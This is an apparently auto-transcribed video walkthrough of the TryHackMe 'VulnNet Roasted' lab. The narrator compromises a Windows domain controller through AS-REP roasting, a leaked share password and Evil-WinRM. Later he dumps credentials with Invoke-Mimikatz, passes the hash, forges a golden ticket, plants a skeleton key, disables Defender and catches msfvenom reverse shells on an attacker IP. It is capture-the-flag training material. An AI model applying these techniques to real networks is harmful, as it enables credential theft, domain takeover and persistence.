Welcome back. So today we're going to be looking at VulnNet roasted, or VulnNet, yeah, roasted. Now I did just do this on stream just the other day, but I'm going to do it, record it this time and everything for you guys. So let's go ahead and let's get it started up. So I already started the machine. Alright, I do have, let me actually get on, right? So I do have a folder already. So if I cd into desktop, try hack me, I get it there. CD desktop, try hack me, VulnNet roasted. We already have a folder with quite a few things in here. Okay, let me go ahead and delete john.pot. Oops. Go ahead and delete him like real quick. Then we can start this guy up, or start doing this guy like right here. So what we're going to start with is, I already started the machine. Let's go ahead and grab that clipboard, right? Copy that, and we'll start off with our mmap. Remember, TAC means all ports, very verbose. Timing of 4, one above the default. I don't know why the heck I just did that. No DNS lookup, and do not ping. So we immediately see 139 and 135 are open, right? Let's go ahead and try an SMB client, 445 and 53. Try SMB client. TAC L. Let's see if we got anything in here. And then at this SMB client, we're going to go ahead and also we're going to run a no password there. We're also going to run an SMB map, because that's going to give us a lot more information on this machine. So there's SMB client. We can see that we can get into it, and we do have a couple things that we could probably look at. You can look at those. You can start to pull usernames off of them and things like that if you want. Or we can also do an SMB map. TAC H, the IP address with anonymous as the username. And we're just going to hit enter for if it asks for a password. But what we're going to be looking at is that IPC. Because if that IPC is read-only, then that means that we can actually enumerate users a different way than just trying to do it through, and he is read-only. So that means that we can try to enumerate users a different way than to do it through, what does it have to go through, all those different files. I don't know why it took me so long to figure out what I was trying to say. So what we can do now is we're going to use Python, not ticketer, not sequence dump, opt-in packet build script 3.9, and I believe it's get mp users that we're doing. So get mp users. That's not going to work anyways because it's Python, not Python 3. What we're trying to do. Python, no, locate, get MP, is it, I believe it's get MP users. It may not be though. You may just have to use like crack-ng or something like that with it and do it like that, but I believe it is get MP users, and then from there you can go ahead and I think it's get MP users. From there, we can go ahead and start to enumerate different people. But I think I need a username to be able to do that one. Okay. Just trying to remember the name of this thing. Okay. Is it SID? Look up SID. Okay. Look up SID. Let's go ahead and grab that, like right there. We'll do a Python. Hit him like right there. Hit enter. And let's see what he needs, right? Or we could have just done Python 3 also. Because this one last night, so we should still have something in here. Boom, boom. Maybe not. Okay, this should be Python. I believe I do actually need Python. That guy. I do believe I actually need a sudo in front of this though. Alright. and then there's a sudo python 3 now. Okay, sudo python 3. Alright, for it to work, I believe. From there, we're going to do tac no pass, because we don't know password yet, right? Tac, we want to enumerate the domain SIDs. We'll likely forward request the domain controller. Domain SIDs, right? We need the, well, those are positional arguments. So we need those anyways. So we need the domain first, which we don't know still, right? We have an idea of what the domain might be, but we actually still don't know what the domain is. So the first thing we need is actually a domain. Let's go ahead and do an mmap tac p. Let's do it for 445. That's the SV. And then for this IP address, maybe we can get something off of here. Let's also see what that 3268 is all about. That port like right there. So, whoops, tac pn. We'll throw that in there. And let's go ahead and see what 3268 is all about. Mmap tac p 3268. Right. Tac pn. Alright, we'll throw those two into there and see if we can get a domain name off of this, because we do need a domain name first. That is something that we're going to need. And we don't have a domain name yet. So, that's something we're going to have to try to find. Right? We may also just be able to do it without the domain name. I'm thinking, I think I can do it without domain name, and I think we actually get the domain name from this. No pass. Let's just try, because we can log it anonymously, right? So what if we just do like anonymous, and then like no password or something like that? Or if we could try something like that, where we do like a anonymous and then at an IP address. Just try that like right there. Anonymous at no pass domain SIDs. Can we do that like right there? Okay, there's domain SID. That's good. We're getting somewhere. So we got domain SID. We still don't know the domain name yet. That's okay. There we go. So we got VulnNet RST. Okay, I wonder if I can actually just grep it for SID type. It's going to be SID type user. I don't remember if it's user. Yep, just user. I wonder if I can do that. We can stop this guy over here. I'm just going to let that go ahead and keep going. I don't know if I can actually grep for a SID type user. I don't know if I can do that, if it'll actually show up, or if I just need to copy all this and paste. Well, we'll try this like real quick. And then we'll grab another one without the SID type user like right there, grepping for it. Just in case if it doesn't work, I don't want to sit here all day waiting for it to work. So we'll do this. And let him go ahead and do his thing. Now we're going to be looking for SID type users, right? And as I said, I did do this yesterday on stream. Oh, cool, you can. So you can just get the SID type user. So if I go ahead and I just do a nano or a cat users.txt, as you can see, for VulnNet RST, we already have all these users. Alright, now we know it is a Windows machine just because of the ports that are open, things like that, so capitalized and lowercase shouldn't matter with it. Alright, but we have all these users now, right? So now let's go ahead and see if any of these users are able to actually get into like SMB or something like that, right? That will be our next process, is can we get an SMB? Should we use Hydra? Should we use you know, like maybe like another in-package script, right? We're going to go ahead and we are going to use get MP users. So we're going to locate get MP users. Alright, and we're just kind of hoping that since we have this user name file that we already made, cat users.txt, right? Since we have their usernames, and we have a read-only on IPC, we're just kind of hoping that we're going to be able to pull something back, especially since this is called roasted. So we're going to try to do ASREP roasting pretty much without actually being on the file system itself yet. So we're going to do a Python opt-in packet, right? Build scripts get mp users.py. Right, we're going to do that for VulnNet RST, right? That's the domain name. Okay. We're going to use a user file, which is users.txt. There's no password, and then domain controller IP address, which is going to be, let me scroll up here if I can find it. Alright, we're going to make our lives easier, and we're just going to, there we go. Domain controller IP address. There we go. Now, we should be able to ASRep roast somebody, and we get the Kerberos, like right here, okay, or Kerberos roasting somebody, okay. So we get the Kerberos pass file like right here, all right, for his ASRep, and let's go ahead and like I said, I already did this yesterday. So if I do an lsec.la, I have my cur.hash or cur.hash and then cur-hash.text. Let's go ahead and cat that cur.hash, see what that is. All right. This looks like it's it, so we can use, nope, excuse me, that was for somebody else. Let's cat cur-hash.text. Alright. And this is what we want, like right here. No, that's, why do I have two of the same exact thing? Looks like we're going to make another one, huh? Let's go ahead, oh, there it is, ASRep hash.text. Okay, so let's go ahead and use a John for ASRep hash.text with a word list of equals user share word list rocky.txt. Right? And we do get a password back. So let's go ahead and copy that for the username of tskid. Let's go ahead and do a nano path.txt. And it's tskid that. There we go. Alright, so we do have something now, right? Let's go ahead and try doing another SMB client. See if he can get anywhere into like IPC or net logon or somewhere, right? We'll go ahead and use that same IP address up here, and we're going to do with a user. I don't remember if it's lowercase or capital. I think it's capital U for some reason, but it's probably going to be lowercase. User's going to be tskid. All right, let's go ahead and do a. Actually, I need to know what the heck is in there again, don't I? Net logon is one of them, right? And for his password, we'll throw this guy into there, right? And net logon should be one of them. Let's do a directory, and we do get reset password.bbs. Okay. Now, if you were watching the other day on the stream, I went in somewhere else. I forgot which one I went into. I didn't go into net logon, but I just kind of worked my way through the system, and I found this reset password.bbs. We go ahead and get that. Get reset password.bbs, and we'll go ahead and exit out of here. Let's go ahead and cat that reset password.bbs. And as we're scrolling up, we're going to see something. All right, we're going to see a password in plain text for a user. So I'm going to scroll up, and all of a sudden I see a white hat, and I have this password. Let's go ahead and nano pass.text. All right, I'm going to do a white hat, and we have this password like right here. Let's go ahead and try to log on the system. EvilWinRM, right? Attack I, the IP address correct? Who are we attacking? Okay. Attack U, what is the username? A white hat. And then attack P, what is the password? Right here. And let's go ahead and try to log on to there and see if we get anything with EvilWinRM. We can also try with tskid if you want to. So we can do EvilWinRM, and we can try it with tskid there. I don't know why I just did that, but we'll go ahead and grab that guy right there. Tskid. And then his password, which was, I'm going to have to cat it again. Cat pass.text. His password, which is right here. Try that. Might have to actually put in that quotation marks because it doesn't really like that star at the end. So let's go ahead and put that in quotation marks. There we go. And we do get in as a white hat. So let's go ahead and do a dir. Alright. And we'll see if there's anything in this document for every first hop in. Doesn't look like it. Let's go ahead and do a whoami/priv. And we can see we got a lot of privileges, right? So we're not even going to try to do power up. We're already there. We're most likely already an admin. Alright. And if we have all these privileges, we can most likely just add another user. Let's try it. Net user, we'll say Ryan. And as we can see, tskid was not able to log in. So we'll do net user Ryan. Actually, I'm going to do that just so you guys can make sure you guys can see it. Net user Ryan, PASSW0ID1 /add. Let's see if we can add him. We can. Okay. Let's go ahead and do a net local group administrators /add Ryan. See if we can add him. We can. Alright, cool. Let's also do it for remote desktop users. I don't think remote desktops actually turn on this box though. And with the domain controller, you have to actually go in and actually install that remote desktop service. I don't think it's even turned on in this box. Let's go ahead and do an evil1rm. Tag I. The IP address for this box, right? We just do a quick IP config. There it is. Tag U Ryan. Tag P PASSW0D1. Let's try that, like right there. And then we'll CD into the C drive. Users. See who else is on this box, right? Do a quick directory. And sure enough, there's Ryan. Cool. And we also have Enterprise Core VM. Let's go ahead and CD in that Enterprise Core. And also Administrator. So we'll hop into those two guys, see if we get anywhere. Okay. Whoops. Directory, probably go into desktop or whatever else. Desktop, documents, downloads. 3 main places, right? And Ryan did get in. Let's go ahead and see if we can CD into Administrator. Desktop. So he can, and let's see if we can do a type for system.text. And he cannot. Permission is denied for him. Okay. So even though we're part of the administrators group, we actually can't read that. Which that's kind of strange, huh? Net local group administrators. Alright, let's go ahead and CD into desktop. Ryan is part of the administrators. I wonder if I actually need to be a domain admin, maybe. Let's go ahead and do a net local group domain admin /add Ryan. Can I do that? And up here, we'll go ahead and do a dir. Okay, no, I didn't think I could. That's okay though. And we'll do a type user.text. So we can do that. Okay, cool. Now I'm wondering if I could always just change the administrator's password. I could do that. But before we do that, let's go ahead and look at some other things we can do. Let's go ahead and get Mimikatz up and running, right? So let's do a, first off, I think what we're going to actually need is an AMSI bypass. At least that's what I would think we're going to need for this guy. We can always get MP preference and see if, Windows Defender is actually on or not. But I'm just going to grab an AMSI bypass just in case you guys see me use this. If you're on this video and you haven't seen me use this yet, go ahead and check out the hacking with PowerShell stuff that I have, which is probably about a couple months before doing this one, like right here. So on YouTube, and that'll show you the AMSI bypass and everything else. I'll also do a cat or an echo. Nope. Nano scripts. And we'll say AMSI bypass. Text. There we go. Okay. So now we did that AMSI bypass. Let's go ahead and locate Mimikatz. So we're actually want the machine library one, this invoke Mimikatz. And if I do an ls-tech-la, you notice that my invoke Mimikatz is not the right one in here. So let's go ahead and move tech rs invoke Mimikatz. So, and then let's go ahead and locate that guy again. So like that. I don't think those two are the ones I actually want. So like this. Alright. This is the one I believe I want, like right here. So let's go ahead and copy over into here, ls-tech-la. And you notice that this guy's bigger, right, than the other one. I noticed that this one is newer, I believe, so works a lot better. So let's go ahead and do a Python 3 tag m HTTP server, right? And over here we'll do an IEX IWR. We're going to put that into memory, right? Use basic parsing, and we're going to do that for HTTP 10. Okay, this is all messed up. There we go. IEX IWR tag use basic parsing. That's to make sure, in case Internet Explorer has never been started up, that it automatically still puts into memory. Use basic parsing HTTP 10.13.26.184 / invoke mimikatz.ps1. Alright. Should see it come back over here, and we do. Alright, so he does get a get, and it's a 200, so he's getting him like right now. It's going to take a minute. It's obviously a larger file. Then from here we can dump mimikatz, and once we dump mimikatz, we can then grab that administrator hash. Let's go ahead and do an invoke mimikatz cat command LSA dump LSA /patch. Alright. And that is going to take a minute to dump also, just so you know. Now, once that's done, I'm actually, no, I'm not going to change the password yet, never mind. Let me go ahead and exit out here, or Control C yes, Control X yes, whatever it is. There we go. We'll clear that out, and we're going to go ahead and we're already going to get this guy ready to go. So we're going to do evil-win-rm. Tag U is going to be administrator. Capital H, because we're going to be using a hash to pass the hash for this mimikatz, whatever we get from this mimikatz, like right here. So we don't ever need to actually break a password or anything like that to get on the system. We just need to pass the hash, and that'll allow us to be able to do everything that we need to do, pretty much. We also need to get no, we don't, never mind, I was about to say we also need to do a mimikatz pass the hash, but we do not, because we're going to be doing it on evil-win-rm. And we're not trying to create a new session, or we're not within PowerShell whenever we do that, right? So we could try to be in PowerShell. We could do that if we want to. But yeah, we don't need to be, because we can utilize that that evil-win-rm, like right there. There we go. He just dumped. Okay, we see that we have a lot of stuff in here. Alright. And there's the administrator hash. Let's go and grab that. Throw it down here. Hit enter, and we'll see if we can pass the hash down here with the evil-win-rm. Now, I do have some other videos that show a lot of different types of passing the hash. That's my PMPT series. Just going through and just trying different pass the hash, stuff like that. And as you see, we do get on. We can CD into C drive, users, administrator, desktop, and then type system.txt, right? I think it was called, and there we go. Okay, so there's one way to do it, right? Go and exit out of here. What we're going to do now is let's go ahead and do a net user administrator, and then just change the password. Password 1. Let's try that. We'll go ahead and try to log back in again with TAC-P, password 1. But obviously, if the administrator's password is changed, he's obviously going to realize it very quickly. But that is another way we can do it, is we can just change the administrator's password. Okay. So let's do a quick CD, or type. Let's do a type. And / desktop system.txt, and there we go. Alright. We could also, I believe, do a net local group administrators /add tskid, I believe it is, right? That's what I'm on like right now. But who am I? I'm tskid, correct? No, I mean white hat. Whoopsie daisy. Let's go ahead and do a white hat. A white hat. I think I might be able to actually CD into the C drive, users, administrator, desktop, / and then we'll do a type system.txt. I think I can do it like that. I cannot. Okay. I don't know if this is going off administrator or what it's actually going off of. So let's go ahead and check out that user administrator. Let's see what this guy, what this guy's all about and why he's different than everybody else. So he's part of administrators, domain admins, domain users. So we'd have to put him in that domain, huh? And it's VulnNet. So I wonder if we can actually do that local group, a white hat. Do it like that. We do a domain admins. Do it like that. So our local groups not exist. Okay, that's okay. Okay. Well, that is okay because we got everywhere else so far. So we changed the administrator's password. We're able to get into him also, right? From here, there are other things we can do. We could try to create a session with it. I don't know if we can or not. I don't know what's open. I don't actually know. You know what? Let's actually see. Let's see what we have going on in this guy. We'll do a K-list, see what kind of tickets are made, things like that. There's 0 cash tickets like right now. Let's go ahead and start to look at this guy and see if there's anything really that's, you know, standing out to us, like constrained delegation, see if we can do anything with that. We're going to have to get power view over here. So let's go ahead and locate power view. This guy needs power view dev and power view. Do I not have power view dev on here? Do I not have power view on here? Okay, we have power view somewhere. Alright. Power view.ps1, there we go, okay. Let's go ahead and copy that into our folder that's hosted in our Python server, right? So we'll copy that into our folder in our Python server. And then we can go ahead and do a get power view on here, right? IEX, IWR, use basic parsing. Then from here we'll do our 10 HTTP 10.13.26.184 / power view .ps1. And I forgot to do that. There we go. So let's get power view over here and see if there's anything crazy going on with this guy. I don't know if I need power view dev though. I might actually need power view dev. And if we do, I mean, we'll figure it out from there. So I'm pretty sure for this I actually need power view dev. So we'll do a power view dev PS1. And let's go ahead and grab this guy like right here. Go to raw. And we'll go ahead and we'll do a copy him. I don't know if this guy can actually reach out to the internet or not, but let's try IAX, IWR, use basic parsing. Actually, you know what? I'm just going to do this. There we go. And we'll try to get power view dev in there also. See if he actually reaches out to that site and actually grabs it or whatever else. And from here, we're going to try to see maybe there's constrained delegation. You know, we don't know. Unconstrained delegation. Maybe there's different things that we can do. Different things that we can work on with this box. If you were just looking just to complete it, you already have. Routine posture check. Is that better? Leaning too far forward. Alright, he is still trying to hydrate. Oh man, I gotta grab another Pepsi. Give me 1 second. Alright. There you go. Cheers. Alright. Drink anything to stay hydrated. Hey, you know. Grab the water. This guy's taking a minute to actually get out there, so let's go ahead and also... Okay, what's this? Unable to connect to remote server. Okay, so let's go ahead and actually download. We'll do a wget for it. For that guy right over there. Now, he's in VulnNet roasted now, so let's go ahead and... How you doing? What is that? Like, is it okay if I call you soon? So let's go ahead and do an IEX IWR. Let's go ahead and do that again. This time we'll do it for PowerView Dev. And since this is a Linux box, we do have to make it so, you know, he is CUDA. Okay. Oh yeah, that's much easier. So since this is a Linux box, we do have to make sure that we have our capitals where we need them and everything. Oh, it's a beautiful night here. So you know, every day's a good day. Ooh, what is this? 10.13.26.24. Web error. We have PowerView. Okay, did I do _dev? Because that's how I'm used to typing it out. Yep, tac dev. There we go. Yeah, it's always, every day's a beautiful day here, you know, so can't complain. There we go. So we have PowerView Dev now. Let's go and send it, see if we have any type of user constraint delegation. So we'll do a get domain. I have no idea. Get domain user, and I believe it's trusted to auth. Tac trusted to auth, like authenticate, right? We'll see if we get anything, maybe for CIFS or something like that. I'm kind of hoping we get it for CIFS, then we can change it over HTTP and get it in a different way. Cool stuff like that. For now, I can have to find that trusted to auth. So see if we have any type of constraint delegation sitting around here. No, we do not. Okay, what about get domain computer? Get domain computer. Tac trusted to auth. Alright, nothing with those two, like right there, so nothing with constrained delegation. Alright, which is good. I guess it's a good thing. Let's try to do some kernel roasting, right? See if there's any server principles in here that we might be able to attack. So you do a get net user SPN. I think it's actually tac SPN. Try that guy like right there. Now remember, I do have PowerView and PowerView Dev already on here. So if anyone's like, hey, that's not PowerView or not PowerView Dev or whatever, I do have both. Alright, so we have sys for VulnNet. So that's the service principal name. So we do have sys as a service principal name, but since we don't have constrained delegation, so it's not utilizing sys for like constrained delegation, we can't show something like how to use an alternate service or something like that, which would have been pretty cool. But no, we're not going to be able to do that. But you know what we might be able to do is let's create a golden ticket, since the PMPT is becoming a much bigger deal. A lot more people are starting to take it and things like that, and persistence is part of it, right? Let's go ahead and do let's go ahead and make a golden ticket. So I already did an LSA dump. We're gonna do it one more time though. We're gonna do an invoke mimikatz. Tac command LSA dump LSA/patch. Right. So go ahead and we'll do that. And yeah, I'm gonna try to get a golden ticket going. And ow, just kicked my own desk. Sorry. But yeah, I'm gonna go ahead and we're gonna look at the KRB TGT hash, and we're gonna go ahead and try this guy. See if we can get a golden ticket working for us. And we probably won't actually, because we're not gonna be going from like one server to another one for the domain controller. Windows box is always hard. Oh, we're done. Windows box is finished. We got it in about the first 10 minutes here. So the Windows box is done. Now I'm just kind of playing around, seeing what else we can do with it. Yeah, we did ASREP roasting, received the hash from there. After we got that hash, we went ahead and cracked it. Utilized SMB net logon, saw that there was a password reset thing in there, looked at that, found someone's password, and then from there we went ahead and logged in as that guy. Saw that he had tons of privileges, so first I did invoke mimikatz, grabbed the administrator's hash. We logged in with that through evil WinRM, and then I just changed his password and we logged in through that through evil WinRM. So yeah, we got the administrator's hash and everything. We got both the, I don't know what to use at starting for Windows boxes. So to start Windows boxes, right, you got WinPeas. So this is a lot like LinPeas. WinPeas is really good. PowerUp.ps1. I would definitely start Windows boxes without any I would definitely like to very first get onto a Windows box. You're gonna want to look at SMB. SMB is a good attack vector, like right there, right? If you know it's a Windows box and it has a port 80, like maybe you're working with like Jenkins or something like that, you just have to change out that Jenkins attack to work with Windows. So you can't just throw, you know, your regular reverse PHPs at it, things like that. You do have to work a little bit to get a Windows one, which are on GitHub and everything. And yeah, once you're on it, Power Up, WinPs, Power View, those things are really your best friends, like right there. So Power Up to get local administrator privileges on it. Power View to start looking at the domain. Power View Dev to start looking more at the domain. And then just start looking at like ASREP roasting, Kerber roasting, things like that. So I do have a series on PMPT that's already on YouTube. And then in May, I have a series that's coming out that's for hacking with PowerShell and just using just PowerShell, no Kali Linux. Let's go ahead and grab that KRB TGT, right? We'll grab this one like right here, and we want to go ahead and we want to try to make a golden ticket, right? So we're going to do an invoke command. Invoke Mimikatz, attack command. We're going to do a Kerberos golden, right? Because we're making a golden ticket. All right. From here, we're then going to use user, and we can just make up a user. We're going to say user as administrator. Okay. It's not the administrator user, but we're going to say it is. Okay, we're going to say user administrator, right? We're going to say what domain it belongs to, which we already figured out the domain was VulnNet RST, right? From here, we're going to go ahead and we're going to do the SID, which we do have the SID for the domain, right? There it is. There's our SID / SID. Okay. The next thing we're going to go ahead and do is we want to put in the KRB TGT hash. So we're going to do /KRB TGT, and we're going to put in his hash. There we go. Then we want to put in the ID. Okay. We want him to be 500. We can do 500, 502, whatever, something in the fives, and then the group of it, right? So we want to do like ID 500 group 512, some of that. Okay, so we can do like an ID /ID 500 /group and groups 512. Okay. Hey, you too. You have a good one. Groups 512, and then we're going to go ahead and we're going to do a pass the ticket right for this, okay? Because we're going to be using a Kerberos ticket with a golden ticket. So we're going to say /pass the ticket. And I definitely just messed up that. Yep, I know. You couldn't figure it out. I know. I'm sorry. There we go. There. Okay. And so invoke Mimikatz, attack command, Kerberos golden, user administrator, make up a user if you want, domain VulnNet roasted, RST, the SID of the domain controller, right? The KRB TGT hash, ID, put it 500, 501, 502, something like that, groups 512, make sure it's within the administrator groups, and then we're going to pass the ticket. Now we can also change things like how long that ticket is going to be valid for, like the max renewal date, when it's going to end, when to start the offset, okay? Like how many minutes to start it in, things like that. And those are kind of things that, like, as you do more and more with Windows machines, as you learn more and more with Windows machines, you start to learn different things, like, you know, within Kerber roasting, and you can start to figure out different stuff within Kerber roasting. So domain does not look like a full qualified domain name, that's okay. And you can actually see, hey, how long are their tickets made for? So this would be more for like a real life scenario kind of thing. You know, how long are the tickets actually used for? How long are, you know, when do they actually get instilled and everything like that? You can utilize that information and make your ticket kind of blend in with the other ones instead of having a ticket that lasts 10 years. Maybe their tickets last 60 days or something like that. So you can do it like that also. But that's more and more going deeper and deeper into Mimikatz stuff. The CRTP does great on teaching Mimikatz and attacking Windows machines and things like that. CRTP does absolutely excellent with all that stuff. So we should see ticket was created. Okay, so we now have a golden ticket, right? Now, kind of the problem like right now is that we don't have, we're not going from one machine to another. We're already on domain control, right? But if we do a K-list, we should see that ticket. And we do. We do see the KRB TGT ticket, right? So we have it there. But if I do like an LS or anything, if I try to do something within here, it's not going to prove that it works. You know, so that's the only thing. What you would now do from here is you would now try to do, you would try to get like a session or something like that, or maybe a DC sync and try to get it from, you know, a different domain or something like that. You know, whenever you have like trust domains and things like that. So you try to get like a session or something. The thing is though that we're already on the domain controller, so we can't really show like, yeah, our KRB TGT ticket's working. We can't just, you know, it's working. It's there. It worked. I can guarantee that it would work. We have our golden ticket. We now have persistence also. So that is one thing within the PNPT is you need to create persistence. All right. From here, I mean, we could make a silver ticket. So let's go ahead and, you know, make a silver ticket if we want to, which is going to be using one of the services. Which, no, we can't because our service, I mean, I know our service exists, but we don't have any actual services right on here, do we? So, only so much we can actually do here. We could try invoke Mimikatz. Attack command. I really don't think this is actually going to work. Miscellaneous. Skeleton. We try make the skeleton key. Try using that attack. I don't think it's actually going to work, and I'm not very good at this command, this attack right here. This is one that isn't really used as much anymore because it doesn't really work anymore. So we're probably just going to get an error, but if it does actually work, then we now have a skeleton key in. So sorry, I don't know how to drink water. But we'll see if this actually works or not. Because if you do have a skeleton key, then you'll also have persistence. That's just another version of persistence. And I don't know if PNPT ever goes over skeleton keys. So oh, we have made a skeleton key. I did not see that coming. So this machine has obviously not been updated in a while because there's now a patch that doesn't allow you to do that. But we've now made a skeleton key, and I've never actually gotten this to work. So I don't really know what to do with a skeleton key. So so now we should be able to log on as any user with the current password. So we should be able to log on as any user with the current password, which would be a White Hat's password. I think that's how it works. If anybody knows, please let me know. His password is right here. So now I'm wondering, should we log on as the administrator with this password? Now this does not work across reboots. Do we need to know that much? But I think we can log on as any user with the current password. see here. Windows skeleton key or skeleton key attack. Unlocking Active Directory with skeleton key. Okay. Let's see here. Alarmingly easy. I mean, it really was. We just did it, but and I don't even know really. Okay. Maybe catch. Okay. Before the attack is very straightforward to do. It only requires the following command. Miscellaneous. You have skeleton. After that, you can authenticate as any user with the default password of Mimikatz. Okay. Wish you would have told me that. Okay. So nails with a capital M, right? So Mimikatz. Capital M, lowercase k. Yep. So we should be able to authenticate as any user with the password of Mimikatz. So right now I'm going to try to authenticate as the administrator, which I'm not the administrator. I'm a white hat up here with the password of Mimikatz. And we'll see if this works. If it does, that'll be awesome because I was not able to show this in my PMPT video or my hacking with PowerShell video because both of those servers are up to date. Okay, that did not work. Error. So it's saying an authorization did not work. Well, let's go ahead and let's try to type C users, or can we type that like right now? System.txt? I hope not. Okay, cool. So we can't type it. Can we type system.txt, and then we can do it as user/user administrator with a password of Mimikatz. Well, he has a lowercase. Now they're killing me. Can I even do that in PowerShell like that? I don't know. Okay, so let's try it like this. Mimikatz lowercase m. I don't know how you use PowerShell to log in as another user, and I don't think I get the command prompt from here, can I? No. Okay. Kicks me right out. Let's try it like this. Where Mimikatz is lowercase. Hopefully that works. That would be pretty sweet. I'll do a view file. View file as different user PowerShell. Running PowerShell is another user. No, not running PowerShell. Run PowerShell script is a different user. Start PowerShell. Invoke item. Yeah, it's like shift right click on as. So we can't log in down there. The WinRM, okay. So we want to view file as different user PowerShell run as another user. Let's try that without right clicking. I mean, we all know we can right click, right? Start PowerShell attack credential. Boom, boom. Yeah, we all know we can do that. Yeah, we all know we can right click. Start process. Attack credential. Maybe we should just go to command prompt. That would be way easier. Run command is not a user. So can I just do, let's run as.ps1. So this guy has like a whole like run as.ps1. This seems like a lot of work just to run something else as somebody else, you know, within PowerShell. It seems like PowerShell should already have a different way to be able to do it. At this time, we have credential level and credit object. Start another PowerShell instance with these. Okay, I don't want to start, but start process. I actually just want to type. that attack credential, attack attack verb run as. Okay, let's try that. Let's try to do a type. We'll type system.text attack verb run as. This is way more difficult. I feel like it has to be. Attack credential, or probably need a username first, right? Yeah, this is becoming way more difficult than it has to be, so I'm about to just say screw it. Run as, there we go. We know the easiest way is Windows File Explorer GUI, but can't do it there. I think we can run a command, like command.exe, then put in the rest of it. Run as command. That's for command prompt. What about PowerShell? Is there anything in here about PowerShell? Okay. Oh my God. Alright, yeah, I'm just not. If you want to try that out, you can try it out, but that is going way too deep. Attack verb run as administrator. And we'll just say his password is mimicat. Yeah, I didn't think so. It has no idea what the hell I'm trying to tell it. Okay, cool. Verb run as. What if I just do like a verb run as? That's super weird to me too. You just type in attack verb. Okay, yeah, it has no idea what the hell we're talking about. Okay. We'll try that. We'll try to do different stuff later on. We'll see what happens. You know. What's up, Ace? How you doing? You know, how do you run something that has a different user in PowerShell so they can't get command? If we type in command.exe, and then we type in the rest of it, right? We'll run all that. So let's go ahead and do, yeah, I want to run as /user, run as /user administrator, right? I don't have any saved creds. Can I do administrator then put in the password afterwards? User core, boom, boom. Okay, it's going to tell me to enter the password. That's another problem too, is I don't think I can actually run as. Administrator PowerShell.exe. Can I do something like that to where it's going to execute that and then we're going to get a PowerShell? I don't think so. Not looking like not looking good for us. There actually is one more thing I could actually do, huh? Let's go ahead and let's make MSF Venom. Let's make a reverse shell. And let's do a Windows shell reverse TCP. We'll call it common.exe. Sure, that sounds good enough to me, okay? Let's go ahead and do a set MP preference. Attack disable real-time monitor. I think it's monitor, or is it monitor? I think it's monitor is true. If not, then it's monitoring is true. Let's try that, like right there. Disable real-time monitor, or it might be monitoring. I don't remember. Guess we will find out in a second. Alright, that looks like it worked, okay? And so now what we just did was we just disabled real-time monitoring, like right there. And we will go ahead and we will upload now common.exe. So we turned off the firewall, right? That's pretty much what we did. Let's go ahead and hop over MSF console, right? Because we got to use exploit multi-handler. Set payload to this guy. use exploit multi-handler, set payload to him, set lhost to here, set lport to, I believe it's 443, right? Yep, 443. Go ahead and run that, and we'll go ahead and do a /common.exe. So that's what we called it, and we'll see if we get that callback down here. And we do. So we get command shell session open, right? Now what we can do is we can go ahead, because it said it worked between reboots, right? So let's do a dir. Who am I also? Because I should just be white hat, okay? So let's do a type system.text. Shouldn't have anything in there, right? Access is not, okay. Let's go ahead and do a type system.text /run as administrator. And then for the password, oh, the syntax is incorrect. Run as, boom, boom. Okay, that tells what to run as. Okay, I see. So we'll do a run as, then what is it, user or something like that? /user, administrator, right? So we'll do a run as /user administrator, and then we'll type in what's a run, but type system.text. Can I do that? There's just mimikatz after that? For like the password? Will that even work? Okay. Ooh. Kick me out. Like, kick me out like immediately. Let's try that one more time. Okay, so it keeps kicking me out immediately. So let's go ahead and actually back out of here then. Search for shell 2, right? Shell interpreter, use 0, set session to 1, show options, go ahead and run that. So we're going to use shell to interpreter now. At least we're going to try to see what happens. Hopefully we get an interpreter session, then we'll try to get a shell on from there, and then we can try to do run as again and see if that skeleton key actually worked now. It looks like it worked. It really does. It looks like it worked. We do know that we do have our, ooh, okay. We got a little problem like right there, huh? So we do know that our golden ticket worked, but shell to interpreter does not want to work. So let's actually go ahead and background Metasploit, and we'll go ahead and do an MSF Venom. Attack P Windows x64 interpreter, right? We'll call that shell.exe, lport 111. Okay. Then we'll go ahead and upload shell.exe. Alright, and then what we'll do from here is we'll go ahead and foreground it, and we'll use exploit multi-handler. We'll set our payload to this guy right here. Set payload to him, set our lhost to ourselves, set lport to 111, run that, and then we can do a /shell.exe, and we should get an interpreter callback now, right? Okay, so now we got an interpreter callback, cool. And we'll go ahead and make a shell on this guy and see if we can do that run as command all over again. So let's scroll up, and we'll try and grab that run as command. So I'm just wondering if it has to do with that system.text, how we're just trying to type something out. I don't know if it has to do with that or not, or what's going on there. Let's go ahead and do a Control-Z, or nope, excuse me, not Control-Z, but a shell. So it's taking a sweet time to get a shell. Really? Okay. Am I like even on this machine anymore? Is this machine dead? No, okay. Yeah, you never know, right? You're still working up here and stuff, right? Yeah, obviously we just did the shell.exe, just came back down over here. But interpreter does not seem to be working like right now. Get UID? Like, are you actually on this machine? Or did it kick me out of the machine? See, I have had that problem too with this box, like right here, just getting randomly kicked out of it and stuff like that. But if it kicked me out, that's gonna be it for tonight. I mean, we did a lot. Yeah, it looks like it kicked me out, like right there. I have no idea what the hell all that is. But yeah, we got on the machine. We ended up using the administrator's hash to log in. We also changed his password, logged in with that, right? From there, we also turned off real-time monitoring. We did some Venom stuff. Got some callbacks on Metasploit. We also used PowerView Dev, right? We made a golden ticket. We used regular PowerView, but we couldn't really find much in there because we didn't have any type of constrained delegation or anything like that. But we made a golden ticket. And we're pretty sure we also made a skeleton ticket or a skeleton key. We're just not able to utilize it the way that we would like to, you know. In case you guys are wondering why I just don't get a remote desktop session on here, it's because the remote desktop sessions for this guy with servers, remote desktop services need to be turned on. We know that, and they are not turned on. This guy, they're not installed, so you cannot get a remote desktop session. So even if I do the whole H key thing or with an interpreter, if I do stuff, you can't get it. But that's going to be it for tonight. So we did quite a few things. I feel like we did a lot more than what this box was asking us for, which, you know, if you guys watch my videos, you know I like to go a little bit above and beyond what the boxes ask us. So thank you very much for sticking around. And yeah, thanks a lot for watching. Ace, you have a good one, and I'll talk to everyone later.